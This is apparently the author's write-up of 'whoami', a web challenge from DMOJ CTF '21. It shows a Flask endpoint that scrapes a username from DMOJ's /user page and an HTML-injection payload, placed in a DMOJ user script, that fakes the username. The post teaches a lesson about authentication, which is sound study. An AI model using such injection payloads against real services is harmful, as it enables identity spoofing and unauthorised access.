Don't Trust User Input!

DMOJ CTF ‘21 was a CTF that I created for fun on the DMOJ programming platform. It consisted of 22 challenges that ranged from beginner to intermediate difficulty. I want to highlight one of the problems that I developed, which teaches a lesson about proper authentication mechanisms.

The Challenge

This was the third challenge in the “web” category of the contest, titled “whoami”.

The challenge is a webserver written in Python using the Flask framework. The main endpoint that it exposes is

@app.route('/whoami', methods=['POST'])
def whoami():
	token = request.form.get('token', None)
	if token == None or not 1 < len(token) < 60:
		return 'invalid token'

	token = request.form['token']
	res = requests.get('https://dmoj.ca/user', headers={
		'Authorization': 'Bearer ' + token
	})

	if not res.ok:
		return 'invalid token'

	dom = BeautifulSoup(res.text, features='html.parser')
	user = dom.select_one('#user-links b')

	if user == None:
		return 'invalid token'

	if user.text == 'flag': # https://dmoj.ca/user/flag
		return flag

	return user.text

The Authentication Mechanism

The authentication mechanism being used here involves the use of API Tokens. API Tokens were introduced to DMOJ in 2020, with the idea being that you can authenticate as a certain user with an API token instead of using cookies. This would allow scripts and programs to access DMOJ as authenticated users, which exposed a host of opportunities with regard to developing external tools for the website.

This authentication mechanism uses API tokens to determine whether you have access to a certain account. It does this by making a request to the /user page on the site and finding the username displayed at the top of the page.

More specifically, it queries for the element with id user-links and finds the content of the first <b> tag inside.

At first glance, this seems like a perfectly secure mechanism. After all, the only thing its doing is setting the Authorization header in a HTTP request. By this version of requests, CR-LF injection attacks have already been fixed, so in theory there are only two possibilities: the user enters a valid API Token and the server finds the username of the token, or the user enters an invalid token and the server doesn’t find any username.

There’s More User Input!

It turns out however, there’s more user input here than just what the user can send to the server. DMOJ has a functionality that allows users to enter custom “user scripts” that allow them to run arbitrary JS on every page on the website while they’re logged in. Since the user is entering their own script, there’s no security vulnerability here since it would be a “self-xss” attack.

While at a glance, this shouldn’t be an issue since BeautifulSoup isn’t a headless browser and will not execute JS, if you actually look at the source code of a page with a user script, you’ll notice that the user-script is injected plainly into the HTML of the page.

<script type="text/javascript"><!-- User Script Here --></script>

Thus, since there’s no way for DMOJ to escape HTML out of JS (which would break a lot of scripts), you could enter in </script> to inject arbitrary HTML

The Exploit

Thus, the exploit for this is to create a DMOJ account and set your user script to

</script><div id="user-links"><b>flag</b></div> <!--

This would inject in and comment out the rest of the HTML page, preventing BeautifulSoup from parsing any of it.

Lessons Learned

When designing a system that relies on another service, you have to consider all the user input that is possible, not just the one that you’re taking. Realistically, you should always use a system like OAuth2 or similar to perform cross-platform authentication. When that is not possible, you need to be very very careful about all of the user-input that you’re giving to the user, whether directly or indirectly.